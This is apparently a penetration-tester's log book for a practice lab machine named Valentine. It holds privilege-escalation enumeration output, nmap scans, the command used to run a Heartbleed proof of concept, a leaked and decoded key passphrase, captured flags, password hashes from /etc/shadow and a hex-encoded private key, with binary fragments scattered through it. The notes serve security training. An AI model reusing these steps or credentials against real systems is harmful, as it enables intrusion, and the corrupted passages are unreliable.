-rwxr-xr-x 1 root root 2926 Apr 14 2012 umountroot -rwxr-xr-x 1 root root 1039 Nov 9 2011 unattended-upgrades -rwxr-xr-x 1 root root 1985 Apr 14 2012 urandom lrwxrwxrwx 1 root root 21 Dec 11 2017 whoopsie -> /lib/init/upstart-job -rwxr-xr-x 1 root root 2666 Mar 22 2012 x11-common I [-] /etc/init/ config file permissions: total 332 drwxr-xr-x 2 root root 4096 Dec 11 2017 . drwxr-xr-x 132 root root 12288 Aug 27 14:11 .. 
-rw-r--r-- 1 root root 320 Dec 8 2011 acpid.conf -rw-r--r-- 1 root root 268 Apr 3 2012 alsa-restore.conf -rw-r--r-- 1 root root 267 Apr 3 2012 alsa-store.conf -rw-r--r-- 1 root root 278 Jun 20 2010 anacron.conf -rw-r--r-- 1 root root 1309 Apr 18 2012 apport.conf -rw-r--r-- 1 root root 261 Oct 25 2011 atd.conf -rw-r--r-- 1 root root 541 Oct 17 2011 avahi-daemon.conf -rw-r--r-- 1 root root 1009 Mar 7 2012 bluetooth.conf -rw-r--r-- 1 root root 266 Apr 16 2012 console.conf -rw-r--r-- 1 root root 509 Dec 21 2010 console-setup.conf -rw-r--r-- 1 root root 1122 Apr 16 2012 container-detect.conf -rw-r--r-- 1 root root 356 Apr 16 2012 control-alt-delete.conf -rw-r--r-- 1 root root 297 Apr 2 2012 cron.conf -rw-r--r-- 1 root root 1814 Apr 9 2012 cups.conf -rw-r--r-- 1 root root 510 Jan 1J0 2012 dbus.conf -rw-r--r-- 1 root root 273 Mar 30 2012 dmesg.conf -rw-r--r-- 1 root root 1377 Apr 16 2012 failsafe.conf -rw-r--r-- 1 root root 380 Aug 30 2011 failsafe-x.conf -rw-r--r-- 1 root root 267 Apr 16 2012 flush-early-job-log.conf -rw-r--r-- 1 root root 1247 Mar 14 2012 friendly-recovery.conf -rw-r--r-- 1 root root 317 May 26 2011 hostname.conf -rw-r--r-- 1 root root 557 Mar 29 2012 hwclock.conf -rw-r--r-- 1 root root 444 Mar 29 2012 hwclock-save.conf -rw-r--r-- 1 root root 131 Apr 6 2012 hybrid-gfx.conf -rw-r--r-- 1 root root 571 Feb 3 2012 irqbalance.conf -rw-r--r-- 1 root root 1413 Apr 19 2012 lightdm.conf -rw-r--r-- 1 root root 349 Mar 24 2012 modemmanager.conf -rw-r--r-- 1 root root 367 Mar 18 2011 module-init-tools.conf -rw-r--r-- 1 root root 943 Apr 12 2012 mountall.conf -rw-r--r-- 1 root root 349 Apr 12 2012 mountall-net.conf -rw-r--r-- 1 root root 261 Apr 12 2012 mountall-reboot.conf -rw-r--r-- 1 root root K 1201 Apr 12 2012 mountall-shell.conf -rw-r--r-- 1 root root 405 Apr 12 2012 mounted-debugfs.conf -rw-r--r-- 1 root root 550 Apr 12 2012 mounted-dev.conf -rw-r--r-- 1 root root 480 Apr 12 2012 mounted-proc.conf -rw-r--r-- 1 root root 610 Apr 12 2012 mounted-run.conf 
-rw-r--r-- 1 root root 1890 Apr 12 2012 mounted-tmp.conf -rw-r--r-- 1 root root 903 Apr 12 2012 mounted-var.conf -rw-r--r-- 1 root root 388 Apr 4 2012 networking.conf -rw-r--r-- 1 root root 803 Apr 4 2012 network-interface.conf -rw-r--r-- 1 root root 523 Apr 4 2012 network-interface-container.conf -rw-r--r-- 1 root root 1603 Apr 4 2012 network-interface-security.conf -rw-r--r-- 1 root root 543 Apr 12 2012 network-manager.conf -rw-r--r-- 1 root root 971 Nov 9 2011 plymouth.conf -rw-r--r-- 1 root root 326 Mar 26 2010 plymouth-log.conf -rw-r--r-- 1 root root 899 Mar 18 2011 plymouth-splash.conf -rw-r--r-- 1 root root 800 Apr 13 2012 plymouth-stop.conf -rw-r--r-- 1 roLot root 367 Jan 25 2011 plymouth-upstart-bridge.conf -rw-r--r-- 1 root root 363 Dec 5 2011 procps.conf -rw-r--r-- 1 root root 454 Apr 16 2012 rc.conf -rw-r--r-- 1 root root 705 Apr 16 2012 rcS.conf -rw-r--r-- 1 root root 1543 Apr 16 2012 rc-sysinit.conf -rw-r--r-- 1 root root 457 Mar 29 2012 resolvconf.conf -rw-r--r-- 1 root root 597 Mar 22 2012 rfkill-restore.conf -rw-r--r-- 1 root root 469 Mar 22 2012 rfkill-store.conf -rw-r--r-- 1 root root 426 Mar 30 2012 rsyslog.conf -rw-r--r-- 1 root root 230 Mar 18 2011 setvtrgb.conf -rw-r--r-- 1 root root 277 Apr 16 2012 shutdown.conf -rw-r--r-- 1 root root 667 Mar 26 2013 ssh.conf -rw-r--r-- 1 root root 348 Apr 16 2012 tty1.conf -rw-r--r-- 1 root root 333 Apr 16 2012 tty2.conf -rw-r--r-- 1 root root 333 Apr 16 2012 tty3.conf -rw-r--r-- 1 root root 333 Apr 16 2012 tty4.conf -rw-r--r-- 1 root root 232 Apr 16 2012 tty5.conf -rw-r--r-- 1 root root 232 Apr 16 2012 tty6.conf -rw-r--Mr-- 1 root root 322 Dec 16 2011 udev.conf -rw-r--r-- 1 root root 637 Apr 4 2012 udev-fallback-graphics.conf -rw-r--r-- 1 root root 769 Aug 22 2011 udev-finish.conf -rw-r--r-- 1 root root 356 Sep 29 2011 udevmonitor.conf -rw-r--r-- 1 root root 352 Apr 4 2012 udevtrigger.conf -rw-r--r-- 1 root root 473 Apr 5 2012 ufw.conf -rw-r--r-- 1 root root 329 Apr 16 2012 upstart-socket-bridge.conf 
-rw-r--r-- 1 root root 553 Apr 16 2012 upstart-udev-bridge.conf -rw-r--r-- 1 root root 889 Feb 3 2012 ureadahead.conf -rw-r--r-- 1 root root 683 Feb 3 2012 ureadahead-other.conf -r--r--r-- 1 root root 901 Dec 11 2017 vmware-tools.conf -rw-r--r-- 1 root root 351 Dec 11 2017 vmware-tools-thinprint.conf -rw-r--r-- 1 root root 1481 Apr 16 2012 wait-for-state.conf -rw-r--r-- 1 root root 362 Apr 18 2012 whoopsie.conf [-] /lib/systemd/* config file permissions: /lib/systemd/: total 4.0K drwxr-xr-x 9 root root 4.0K Apr 25 2012 system /lib/systNemd/system: total 112K drwxr-xr-x 2 root root 4.0K Apr 25 2012 basic.target.wants drwxr-xr-x 2 root root 4.0K Apr 25 2012 halt.target.wants drwxr-xr-x 2 root root 4.0K Apr 25 2012 poweroff.target.wants drwxr-xr-x 2 root root 4.0K Apr 25 2012 reboot.target.wants drwxr-xr-x 2 root root 4.0K Apr 25 2012 dbus.target.wants drwxr-xr-x 2 root root 4.0K Apr 25 2012 multi-user.target.wants drwxr-xr-x 2 root root 4.0K Apr 25 2012 sockets.target.wants -rw-r--r-- 1 root root 133 Apr 13 2012 upower.service -rw-r--r-- 1 root root 137 Apr 12 2012 udisks.service -rw-r--r-- 1 root root 164 Apr 5 2012 udev-control.socket -rw-r--r-- 1 root root 177 Apr 5 2012 udev-kernel.socket -rw-r--r-- 1 root root 341 Apr 5 2012 udev.service -rw-r--r-- 1 root root 752 Apr 5 2012 udev-settle.service -rw-r--r-- 1 root root 291 Apr 5 2012 udev-trigger.service -rw-r--r-- 1 root root 231 Mar 30 2012 rsyslog.service -rw-r--r-- 1 root root 433 Mar 27 2012 accounts-daemon.service -rw-r--r-- 1 root root 189 Mar 21 O2012 bluetooth.service -rw-r--r-- 1 root root 432 Feb 25 2012 console-kit-daemon.service -rw-r--r-- 1 root root 219 Feb 25 2012 console-kit-log-system-restart.service -rw-r--r-- 1 root root 201 Feb 25 2012 console-kit-log-system-start.service -rw-r--r-- 1 root root 218 Feb 25 2012 console-kit-log-system-stop.service -rw-r--r-- 1 root root 419 Feb 22 2012 dbus.service -rw-r--r-- 1 root root 106 Feb 22 2012 dbus.socket -rw-r--r-- 1 root root 471 Feb 13 2012 
colord.service -rw-r--r-- 1 root root 1.1K Dec 17 2011 avahi-daemon.service -rw-r--r-- 1 root root 874 Dec 17 2011 avahi-daemon.socket -rw-r--r-- 1 root root 188 Nov 8 2011 rsync.service -rw-r--r-- 1 root root 953 Oct 24 2011 rtkit-daemon.service /lib/systemd/system/basic.target.wants: total 0 lrwxrwxrwx 1 root root 39 Dec 11 2017 console-kit-log-system-start.service -> ../console-kit-log-system-start.service lrwxrwxrwx 1 root root 15 Dec 11 2017 udev.service -> ../udev.service lrwxrwxrwx 1 root root 23 Dec 11 2017 udev-trPigger.service -> ../udev-trigger.service /lib/systemd/system/halt.target.wants: total 0 lrwxrwxrwx 1 root root 38 Dec 11 2017 console-kit-log-system-stop.service -> ../console-kit-log-system-stop.service /lib/systemd/system/poweroff.target.wants: total 0 lrwxrwxrwx 1 root root 38 Dec 11 2017 console-kit-log-system-stop.service -> ../console-kit-log-system-stop.service /lib/systemd/system/reboot.target.wants: total 0 lrwxrwxrwx 1 root root 41 Dec 11 2017 console-kit-log-system-restart.service -> ../console-kit-log-system-restart.service /lib/systemd/system/dbus.target.wants: total 0 lrwxrwxrwx 1 root root 14 Dec 11 2017 dbus.socket -> ../dbus.socket /lib/systemd/system/multi-user.target.wants: total 0 lrwxrwxrwx 1 root root 15 Dec 11 2017 dbus.service -> ../dbus.service /lib/systemd/system/sockets.target.wants: total 0 lrwxrwxrwx 1 root root 14 Dec 11 2017 dbus.socket -> ../dbus.socket lrwxrwxrwx 1 root root 22 Dec 11 2017 udev-control.socket -> ../udev-control.socket lQrwxrwxrwx 1 root root 21 Dec 11 2017 udev-kernel.socket -> ../udev-kernel.socket ### SOFTWARE ############################################# [-] Sudo version: Sudo version 1.8.3p1 [-] Apache version: Server version: Apache/2.2.22 (Ubuntu) Server built: Jul 15 2016 15:32:34 [-] Apache user configuration: APACHE_RUN_USER=www-data APACHE_RUN_GROUP=www-data [-] Installed Apache modules: Loaded Modules: core_module (static) log_config_module (static) logio_module (static) 
mpm_prefork_module (static) http_module (static) so_module (static) alias_module (shared) auth_basic_module (shared) authn_file_module (shared) authz_default_module (shared) authz_groupfile_module (shared) authz_host_module (shared) authz_user_module (shared) autoindex_module (shared) cgi_module (shared) deflate_module (shared) dir_module (shared) env_module (shared) mime_module (shared) negotiation_module (shared) php5_module (shared) reqtimeoRut_module (shared) setenvif_module (shared) ssl_module (shared) status_module (shared) [-] www home dir contents: /var/www/: total 176K drwxr-xr-x 3 root root 4.0K Dec 13 2017 . drwxr-xr-x 14 root root 4.0K Feb 6 2018 .. -rw-r--r-- 1 root root 760 Feb 5 2018 decode.php drwxr-xr-x 2 root root 4.0K Dec 13 2017 dev -rw-r--r-- 1 root root 739 Feb 5 2018 encode.php -rw-r--r-- 1 root root 38 Dec 12 2017 index.php -rw-rw-r-- 1 hype hype 150K Dec 12 2017 omg.jpg /var/www/dev: total 20K drwxr-xr-x 2 root root 4.0K Dec 13 2017 . drwxr-xr-x 3 root root 4.0K Dec 13 2017 .. 
-rw-r--r-- 1 root root 5.3K Dec 13 2017 hype_key -rw-r--r-- 1 root root 227 Feb 5 2018 notes.txt ### INTERESTING FILES #################################### [-] Useful file locations: /bin/nc /bin/netcat /usr/bin/wget /usr/bin/gcc /usr/bin/curl [-] Installed compilers: ii gcc 4:4.6.3-1ubuntu5 GNU C compilSer ii gcc-4.6 4.6.3-1ubuntu5 GNU C compiler ii libprotoc7 2.4.1-1ubuntu2 protocol buffers compiler library ii protobuf-compiler 2.4.1-1ubuntu2 compiler for protocol buffer definition files [-] Can we read/write sensitive files: -rw-r--r-- 1 root root 1711 Dec 11 2017 /etc/passwd -rw-r--r-- 1 root root 850 Feb 6 2018 /etc/group -rw-r--r-- 1 root root 665 Apr 25 2012 /etc/profile -rw-r----- 1 root shadow 1164 Feb 6 2018 /etc/shadow [-] SUID files: -rwsr-xr-x 1 root root 36832 Apr 8 2012 /bin/su -rwsr-xr-x 1 root root 31304 Mar 2 2012 /bin/fusermount -rwsr-xr-x 1 root root 69096 Mar 29 2012 /bin/umount -rwsr-xr-x 1 root root 35712 Nov 8 2011 /bin/ping -rwsr-xr-x 1 root root 40256 Nov 8 2011 /bin/ping6 -rwsr-xr-x 1 root root 94792 Mar 29 2012 /bin/mount -rwsr-xr-- 1 root messagebus 292944 Feb 22 2012 /usr/liTb/dbus-1.0/dbus-daemon-launch-helper -rwsr-xr-x 1 root root 10592 Apr 19 2012 /usr/lib/pt_chown -r-sr-xr-x 1 root root 14320 Dec 11 2017 /usr/lib/vmware-tools/bin64/vmware-user-suid-wrapper -r-sr-xr-x 1 root root 9532 Dec 11 2017 /usr/lib/vmware-tools/bin32/vmware-user-suid-wrapper -rwsr-xr-x 1 root root 14696 Jan 6 2012 /usr/lib/policykit-1/polkit-agent-helper-1 -rwsr-xr-x 1 root root 10408 Dec 13 2011 /usr/lib/eject/dmcrypt-get-device -rwsr-xr-x 1 root root 240984 Aug 11 2016 /usr/lib/openssh/ssh-keysign -rwsr-xr-x 1 root root 23184 Jan 6 2012 /usr/bin/pkexec -rwsr-xr-x 1 root root 71248 Jan 31 2012 /usr/bin/sudoedit -rwsr-sr-x 1 root root 10184 Mar 22 2012 /usr/bin/X -rwsr-xr-x 1 root root 32352 Apr 8 2012 /usr/bin/newgrp -rwsr-xr-x 1 root lpadmin 14688 Apr 9 2012 /usr/bin/lppasswd -rwsr-xr-x 1 root root 62400 Jul 28 2011 /usr/bin/mtr -rwsr-xr-x 1 root root 
37096 Apr 8 2012 /usr/bin/chsh -rwsr-xr-x 1 root root 18808 Nov 8 2011 /usr/bin/arping -rwsr-xr-x 1 root root 42824 Apr 8 201U2 /usr/bin/passwd -rwsr-xr-x 1 root root 71248 Jan 31 2012 /usr/bin/sudo -rwsr-sr-x 1 daemon daemon 47928 Oct 25 2011 /usr/bin/at -rwsr-xr-x 1 root root 41832 Apr 8 2012 /usr/bin/chfn -rwsr-xr-x 1 root root 18912 Nov 8 2011 /usr/bin/traceroute6.iputils -rwsr-xr-x 1 root root 63848 Apr 8 2012 /usr/bin/gpasswd -rwsr-sr-x 1 libuuid libuuid 18856 Mar 29 2012 /usr/sbin/uuidd -rwsr-xr-- 1 root dip 325744 Feb 4 2011 /usr/sbin/pppd [-] SGID files: -rwxr-sr-x 1 root utmp 10096 Apr 30 2011 /usr/lib/utempter/utempter -rwxr-sr-x 1 root utmp 14864 Apr 16 2012 /usr/lib/libvte-2.90-9/gnome-pty-helper -rwxr-sr-x 1 root mail 14664 Mar 30 2012 /usr/lib/evolution/camel-lock-helper-1.2 -rwsr-sr-x 1 root root 10184 Mar 22 2012 /usr/bin/X -rwxr-sr-x 1 root mail 14544 Oct 18 2011 /usr/bin/mail-lock -rwxr-sr-x 1 root mail 14800 Oct 17 2011 /usr/bin/dotlockfile -rwxr-sr-x 1 root mlocate 39472 Aug 17 2011 /usr/bin/mlocate -rwxr-sr-x 1 root mail 14544 Oct 18 2011 /usr/bin/mail-touchlock -rwxr-sr-x V1 root ssh 129104 Aug 11 2016 /usr/bin/ssh-agent -rwsr-sr-x 1 daemon daemon 47928 Oct 25 2011 /usr/bin/at -rwxr-sr-x 1 root crontab 35896 Apr 2 2012 /usr/bin/crontab -rwxr-sr-x 1 root tty 14648 Mar 31 2012 /usr/bin/bsd-write -rwxr-sr-x 1 root shadow 23168 Apr 8 2012 /usr/bin/expiry -rwxr-sr-x 1 root mail 14544 Oct 18 2011 /usr/bin/mail-unlock -rwxr-sr-x 1 root tty 18976 Mar 29 2012 /usr/bin/wall -rwxr-sr-x 1 root shadow 50760 Apr 8 2012 /usr/bin/chage -rwsr-sr-x 1 libuuid libuuid 18856 Mar 29 2012 /usr/sbin/uuidd -rwxr-sr-x 1 root games 132624 Apr 17 2012 /usr/games/gnomine -rwxr-sr-x 1 root games 149016 Apr 17 2012 /usr/games/mahjongg -rwxr-sr-x 1 root shadow 35432 Feb 8 2012 /sbin/unix_chkpwd [+] Files with POSIX capabilities set: /usr/bin/gnome-keyring-daemon = cap_ipc_lock+ep [+] Private SSH keys found!: /home/hype/.ssh/id_rsa /home/hype/Desktop/LinEnum.sh [+] AWS 
secret keys found!: /home/hype/Desktop/LinEnum.sh [-] NFS displayingW partitions and filesystems - you need to check if exotic filesystems # /etc/fstab: static file system information. # # Use 'blkid' to print the universally unique identifier for a # device; this may be used with UUID= as a more robust way to name devices # that works even if disks are added and removed. See fstab(5). # # <file system> <mount point> <type> <options> <dump> <pass> proc /proc proc nodev,noexec,nosuid 0 0 # / was on /dev/sda1 during installation UUID=95d83c75-2be1-4714-bd77-fed615f4b5d9 / ext4 errors=remount-ro 0 1 # swap was on /dev/sda5 during installation UUID=3281446a-d6dc-4ffa-b85a-1e852a310dd7 none swap sw 0 0 /dev/fd0 /media/floppy0 auto rw,user,noauto,exec,utf8 0 0 [-] Can't search *.conf files as no keyword was entered [-] Can't search *.php files as no keyword was entered [-] Can't search *.log files as no keyword was entered X [-] Can't search *.ini files as no keyword was entered [-] All *.conf files in /etc (recursive 1 level): -rw-r--r-- 1 root root 91 Dec 11 2017 /etc/kernel-img.conf -rw-r--r-- 1 root root 321 Mar 29 2012 /etc/blkid.conf -rw-r--r-- 1 root root 6961 Apr 25 2012 /etc/ca-certificates.conf -rw-r--r-- 1 root root 15752 Jul 25 2009 /etc/ltrace.conf -rw-r--r-- 1 root root 333 Dec 11 2017 /etc/updatedb.conf -rw-r--r-- 1 root root 34 Apr 25 2012 /etc/ld.so.conf -rw-r--r-- 1 root root 1260 May 2 2011 /etc/ucf.conf -rw-r--r-- 1 root root 624 May 16 2010 /etc/mtools.conf -rw-r--r-- 1 root root 956 Mar 30 2012 /etc/mke2fs.conf -rw-r--r-- 1 root root 112 Jun 22 2007 /etc/apg.conf -rw-r--r-- 1 root root 10333 Feb 21 2012 /etc/sensors3.conf -rw-r--r-- 1 root root 1309 Apr 18 2012 /etc/kerneloops.conf -rw-r--r-- 1 root root 7649 Apr 25 2012 /etc/pnm2ppa.conf -rw-r--r-- 1 root root 2064 Nov 23 2006 /etc/netscsid.conf -rw-r----- 1 root fuse 216 Oct 18 2011 /etc/fuse.conf -rw-r--r-- 1 root root 2Y083 Dec 5 2011 /etc/sysctl.conf -rw-r--r-- 1 root root 2969 Mar 15 2012 
/etc/debconf.conf -rw-r--r-- 1 root root 350 Dec 11 2017 /etc/popularity-contest.conf -rw-r--r-- 1 root root 4728 Mar 24 2012 /etc/hdparm.conf -rw-r--r-- 1 root root 599 Oct 4 2011 /etc/logrotate.conf -rw-r--r-- 1 root root 19925 Apr 10 2012 /etc/brltty.conf -rw-r--r-- 1 root root 1343 Jan 9 2007 /etc/wodim.conf -rw-r--r-- 1 root root 699 Feb 13 2012 /etc/colord.conf -rw-r--r-- 1 root root 513 Apr 25 2012 /etc/nsswitch.conf -rw-r--r-- 1 root root 1309 Aug 27 14:11 /etc/tpvmlp.conf -rw-r--r-- 1 root root 1263 Mar 30 2012 /etc/rsyslog.conf -rw-r--r-- 1 root root 2981 Apr 25 2012 /etc/adduser.conf -rw-r--r-- 1 root root 572 Mar 7 2012 /etc/usb_modeswitch.conf -rw-r--r-- 1 root root 3343 Apr 19 2012 /etc/gai.conf -rw-r--r-- 1 root root 92 Apr 19 2012 /etc/host.conf -rw-r--r-- 1 root root 552 Feb 8 2012 /etc/pam.conf -rw-r--r-- 1 root root 839 Apr 9 2012 /etc/insserv.conf -rw-r--r-- 1 root root 604 Oct 19 2011 /etc/deluser.conf [-] Current user's history files: -rw------- 1 hype hype 131 Feb 16 2018 /home/hype/.bash_history [-] Location and contents (if accessible) of .bash_history file(s): /home/hype/.bash_history exit exot exit ls -la cd / ls -la cd .devs ls -la tmux -L dev_sess tmux a -t dev_sess tmux --help tmux -S /.devs/dev_sess exit [-] Location and Permissions (if accessible) of .bak file(s): -rw------- 1 root root 1711 Dec 11 2017 /var/backups/passwd.bak -rw------- 1 root root 850 Feb 6 2018 /var/backups/group.bak -rw------- 1 root shadow 702 Feb 6 2018 /var/backups/gshadow.bak -rw------- 1 root shadow 1164 Feb 6 2018 /var/backups/shadow.bak [-] Any interesting mail in /var/mail: total 8 drwxrwsr-x 2 root mail 4096 Apr 25 2012 . drwxr-xr-x 14 root root 4096 Feb 6 2018 .. 
### SCAN COMPLETE ####################################custom-colorsXAIZ|xA ff: fe80::250:56ff:feb9:d009/64 Scope:Link UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1 RX packets:601948 errors:0 dropped:0 overruns:0 frame:0 TX packets:421182 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 RX bytes:100145335 (100.1 MB) TX bytes:101149967 (101.1 MB) lo Link encap:Local Loopback inet addr:127.0.0.1 Mask:255.0.0.0 inet6 addr: ::1/128 Scope:Host UP LOOPBACK RUNNING MTU:16436 Metric:1 RX packets:928 errors:0 dropped:0 overruns:0 frame:0 TX packets:928 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:0 RX bytes:181376 (181.3 KB) TX bytes:181376 (181.3 KB) root@Valentine:/home/hype/Desktop# cat /home/hype/Desktop/user.txt e6710a5464769fd5fcd216e076961750 root@Valentine:/home/hype/Desktop# cat /root/root.txt f1bb6d759df1f272914ebbc9ed7765b2 root@Valentine:/home/hype/Desktop# custom-colors$A _y">Process List root 992 0.0 0.0 19976 976 tty4 Ss+ 14:11 0:00 /sbin/getty -8 38400 tty4 root 1001 0.0 0.0 19976 972 tty5 Ss+ 14:11 0:00 /sbin/getty -8 38400 tty5 root 1005 0.0 0.1 26416 1676 ? 
Ss 14:11 0:01 /usr/bin/tmux -S /.devs/dev_sess <<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<< root 1009 0.0 0.4 20652 4584 pts/13 Ss+ 14:11 0:00 -bash root 1018 0.0 0.0 19976 968 tty2 Ss+ 14:11 0:00 /sbin/getty -8 38400 tty2 root 1021 0.0 0.0 19976 976 tty3 Ss+ 14:11 0:00 /sbin/getty -8 38400 tty3custom-colors$A ;d:7::: games:*:15455:0:99999:7::: man:*:15455:0:99999:7::: lp:*:15455:0:99999:7::: mail:*:15455:0:99999:7::: news:*:15455:0:99999:7::: uucp:*:15455:0:99999:7::: proxy:*:15455:0:99999:7::: www-data:*:15455:0:99999:7::: backup:*:15455:0:99999:7::: list:*:15455:0:99999:7::: irc:*:15455:0:99999:7::: gnats:*:15455:0:99999:7::: nobody:*:15455:0:99999:7::: libuuid:!:15455:0:99999:7::: syslog:*:15455:0:99999:7::: messagebus:*:15455:0:99999:7::: colord:*:15455:0:99999:7::: lightdm:*:15455:0:99999:7::: whoopsie:*:15455:0:99999:7::: avahi-autoipd:*:15455:0:99999:7::: avahi:*:15455:0:99999:7::: usbmux:*:15455:0:99999:7::: kernoops:*:15455:0:99999:7::: pulse:*:15455:0:99999:7::: rtkit:*:15455:0:99999:7::: speech-dispatcher:!:15455:0:99999:7::: hplip:*:15455:0:99999:7::: saned:*:15455:0:99999:7::: hype:$6$vKbykTIV$OCrqMLxv1QcjfhtGMyzzEfhevoTe7sO.v3o1SL3S6wCDc0pXsZvrayn/Wy.TEQuCJWsKLXUh7LakSgTnN/496/:17568:0:99999:7::: sshd:*:17511:0:99999:7::: root@Valentine:/home/hype/Desktop# custom-colors$A o+ [x!;' 10.10.10.79 - Valentinecustom-colorsA4h  ' Log Bookcustom-colors(AI^ɚ(#i' MethodologyNetwork Scanning ☐ nmap -sn 10.11.1.* ☐ nmap -sL 10.11.1.* ☐ nbtscan -r 10.11.1.0/24 ☐ smbtree hype_key passphrase heartbleedbelievethehype custom-colors$A Z u'   Hashesroot@Valentine:/home/hype/Desktop# cat /root/root.txt f1bb6d759df1f272914ebbc9ed7765b2 root@Valentine:/home/hype/Desktop# cat /etc/shadow root:$6$ZC6nSRoi$CLMvXwpiQymsSLYvvF69IpKR8eZkGdZCBokSCTwaUM0x/AfdcSGCSHHFEcam6jyYurcrlXxeSmXkjUlBnXTN2.:17568:0:99999:7::: daemon:*:15455:0:99999:7::: bin:*:15455:0:99999:7::: sys:*:15455:0:99999:7::: sync:*:15455:0:99999\g'  Goodiescustom-colorsVA?& c`e 10.10.10.79 Starting 
Nmap 7.80 ( https://nmap.org ) at 2020-08-27 17:16 EDT Nmap scan report for 10.10.10.79 Host is up (0.060s latency). Not shown: 65532 closed ports PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 5.9p1 Debian 5ubuntu1.10 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 1024 96:4c:51:42:3c:ba:22:49:20:4d:3e:ec:90:cc:fd:0e (DSA) | 2048 46:bf:1f:cc:92:4f:1d:a0:42:b3:d2:16:a8:58:31:33 (RSA) |_ 256 e6:2b:25:19:cb:7e:54:cb:0a:b9:ac:16:98:c6:7d:a9 (ECDSA) 80/tcp open http Apache httpd 2.2.22 ((Ubuntu)) |_http-server-header: Apache/2.2.22 (Ubuntu) |_http-title: Site doesn't have a title (text/html). 443/tcp open ssl/http Apache httpd 2.2.22 ((Ubuntu)) |_http-server-header: Apache/2.2.22 (Ubuntu) |_http-title: Site doesn't have a title (text/html). | ssl-cert: Subject: commonName=valentine.htb/organizationName=valentine.htb/stateOrProvinceName=FL/countryName=US | Not valid before: 2018-02-06T00:a45:25 |_Not valid after: 2019-02-06T00:45:25 |_ssl-date: 2020-08-27T21:21:48+00:00; +2m44s from scanner time. Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel Host script results: |_clock-skew: 2m43s Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 169.08 seconds $ nmap -p443 --script ssl-heartbleed -oA ./ValHeart 10.10.10.79 Starting Nmap 7.80 ( https://nmap.org ) at 2020-08-27 17:23 EDT Nmap scan report for 10.10.10.79 Host is up (0.076s latency). PORT STATE SERVICE 443/tcp open https | ssl-heartbleed: | VULNERABLE: | The Heartbleed Bug is a serious vulnerability in the popular OpenSSL cryptographic software library. It allows for stealing information intended to be protected by SSL/TLS encryption. | State: VULNERABLE | Risk factor: High | OpenSSL versions 1.0.1 and 1.0.2-beta releases (including 1.0.1f and 1.0.2-beta1) of OpenSSL are affected by the Heartbleed bug. 
The bug allows for reading memory of systems protected by the vulnerable OpenSSL versions and could allow for disclosure of otherwise encrypted confidential information as well as the encryption keys themselves. | | References: | http://www.openssl.org/news/secadv_20140407.txt | http://cvedetails.com/cve/2014-0160/ |_ https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0160 Nmap done: 1 IP address (1 host up) scanned in 1.12 secondscustom-colors*A UvLeak Exploit POC: https://github.com/sensepost/heartbleed-poc Description: OpenSSL memory leak vulnerability Discovery of Vulnerability nmap ssl-heartbleed script Exploit Code Used sudo python heartbleed-poc.py 10.10.10.79 443 -f /home/kali/Desktop/Valentine/heartpoc.bin -n 35 Strings heartpoc.bin revealed $text=aGVhcnRibGVlZGJlbGlldmV0aGVoeXBlCg== $ echo aGVhcnRibGVlZGJlbGlldmV0aGVoeXBlCg== | base64 -d heartbleedbelievethehype Proof\Local.txt File ☐ Screenshot with ifconfig\ipconfig ☐ Submit too OSCP Exam Panel custom-colors,A bYd6 0d 0a 0d 0a 44 62 50 72 4f 37 38 6b 65 67 4e 75 6b 31 44 41 71 6c 41 4e 35 6a 62 6a 58 76 30 50 50 73 6f 67 33 6a 64 62 4d 46 53 38 69 45 39 70 33 55 4f 4c 30 6c 46 30 78 66 37 50 7a 6d 72 6b 44 61 38 52 0d 0a 35 79 2f 62 34 36 2b 39 6e 45 70 43 4d 66 54 50 68 4e 75 4a 52 63 57 32 55 32 67 4a 63 4f 46 48 2b 39 52 4a 44 42 43 35 55 4a 4d 55 53 31 2f 67 6a 42 2f 37 2f 4d 79 30 30 4d 77 78 2b 61 49 36 0d 0a 30 45 49 30 53 62 4f 59 55 41 56 31 57 34 45 56 37 6d 39 36 51 73 5a 6a 72 77 4a 76 6e 6a 56 61 66 6d 36 56 73 4b 61 54 50 42 48 70 75 67 63 41 53 76 4d 71 7a 37 36 57 36 61 62 52 5a 65 58 69 0d 0a 45 62 77 36 36 68 6a 46 6d 41 75 34 41 7a 71 63 4d 2f 6b 69 67 4e 52 46 50 59 75 4e 69 58 72 58 73 31 77 2f 64 65 4c 43 71 43 4a 2b 45 61 31 54 38 7a 6c 61 73 36 66 63 6d 68 4d 38 41 2b 38 50 0d 0a 4f 58 42 4b 4e 65 36 6c 31 37 68 4b 61 54 36 77 46 6e 70 35 65 58 4f 61 55 49 48 76 48 6e 76 4f 36 53 63 48 56 57 52 72 5a 37 30 66 63 70 63 70 69 6d 4c 31 77 31 33 54 67 64 64 32 41 69 47 64 0d 0a 
70 48 4c 4a 70 5e9 55 49 49 35 50 75 4f 36 78 2b 4c 53 38 6e 31 72 2f 47 57 4d 71 53 4f 45 69 6d 4e 52 44 31 6a 2f 35 39 2f 34 75 33 52 4f 72 54 43 4b 65 6f 39 44 73 54 52 71 73 32 6b 31 53 48 0d 0a 51 64 57 77 46 77 61 58 62 59 79 54 31 75 78 41 4d 53 6c 35 48 71 39 4f 44 35 48 4a 38 47 30 52 36 4a 49 35 52 76 43 4e 55 51 6a 77 78 30 46 49 54 6a 6a 4d 6a 6e 4c 49 70 78 6a 76 66 71 2b 45 0d 0a 70 30 67 44 30 55 63 79 6c 4b 6d 36 72 43 5a 71 61 63 77 6e 53 64 64 48 57 38 57 33 4c 78 4a 6d 43 78 64 78 57 35 6c 74 35 64 50 6a 41 6b 42 59 52 55 6e 6c 39 31 45 53 43 69 44 34 5a 2b 75 43 0d 0a 4f 6c 36 6a 4c 46 44 32 6b 61 4f 4c 66 75 79 65 65 30 66 59 43 62 37 47 54 71 4f 65 37 45 6d 4d 42 33 66 47 49 77 53 64 57 38 4f 43 38 4e 57 54 6b 77 70 6a 63 30 45 4c 62 6c 55 61 36 75 6c 4f 0d 0a 74 39 67 72 53 6f 73 52 54 43 73 5a 64 31 34 4f 50 74 73 34 62 4c 73 70 4b 78 4d 4d 4f 73 67 